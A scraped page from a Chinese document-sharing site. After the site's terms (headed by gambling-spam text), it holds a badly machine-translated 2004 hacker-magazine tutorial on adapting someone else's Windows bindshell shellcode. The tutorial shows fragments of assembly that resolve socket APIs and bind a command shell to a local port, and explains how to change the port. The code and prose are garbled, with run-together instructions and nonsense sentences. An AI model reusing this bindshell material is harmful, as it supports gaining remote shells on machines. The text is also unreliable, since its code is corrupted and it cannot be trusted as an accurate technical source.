- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
菜鸟也玩shellcode(菜鸟也玩shellcode)推荐
菜鸟也玩shellcode(菜鸟也玩shellcode)
[original] rookie to play shellcode
Article title: [original] shellcode top rookie also released the most lonely invincible: 2004-12-2808:15 landlord [[original] rookie playing shellcode
Article author: Invincible most lonely [EST]
Source: Evil octal information security team
Source: hacker X Files
X file on the previous period, I wrote a rookie, but also to write exploit, which describes the location of the overflow point, as well as the preparation of exploit. Its all a rookie thing, and I dont know if my readers have learned something. This time I have brought you an overflow of articles, mainly for everyone to introduce some rookie level shellcode prepared.
As we all know, the preparation of shellcode is need a lot of programming skills but also familiar with the underlying operating system knowledge, so we still have to use others to write shellcode (dont hit me, you see my title: play instead of writing). In other words, we are trying to transform an expert into good writing and shellcode to be his own stuff.
Manual articles
First of all, we have to prepare our main course - shellcode. I found a couple of shellcode on . Look at the one below:
[BITS32]
Global_start
_start:
LCaller:
CallLLoadFunctions
LDataSegment:
Economy;
DD CMD
Dd0x79c679e7; closesocket 12
Dd0xe5; accept 16
Dd0xe92eada4; listen 20
Dd0xc7701aa4; bind 24
Dd0xadf509d9; WSASocketA 28
Dd0x3bfcedcb; WSAStartup 32
.
.
.
.
.
.
.
LBind:
Pushedi
Pushedi
Pushdword0x; port8721
Movesi, ESP
Pushbyte0x10; length
Pushesi
Pushebx
Call[ebp+24]
.
.
.
.
.
.
.
I just listed some of the key code, complete code, see the cd. This is a compilation of the bindshell, which can bind a cmdshell to any local port. All we have to do is to write the above code in shellcode form.
The first mosquito I that lie Kou straw industry ushdword0x; port8721
This is the bound port, for example, we want to bind 1234 ports, then the first 1234 to sixteen decimal is 04d2, and then in accordance with the low,
您可能关注的文档
最近下载
- 职业技术学校电子商务专业人才培养调研报告.docx VIP
- 材料力学课堂教学(中文版)-范钦珊-材料力学-第2章.ppt VIP
- 售后服务承诺书范文(精选7篇).docx VIP
- 《AIGC应用实战:写作、绘图、视频制作、直播》课件 第六章 AI视频制作.pptx VIP
- 南充市阆中市小学数学二年级下学期数学期末试卷.doc VIP
- 中国国家标准 GB 16796-2022安全防范报警设备 安全要求和试验方法.pdf
- 《AIGC应用实战:写作、绘图、视频制作、直播》课件 第五章 Stable Diffusion的使用方法.pptx VIP
- 工程造价结算审计的方法和技巧.docx VIP
- 材料力学课堂教学(中文版)-范钦珊-第1章 基本概念.ppt VIP
- 学生奶采购配送服务方案(技术标).pdf
文档评论(0)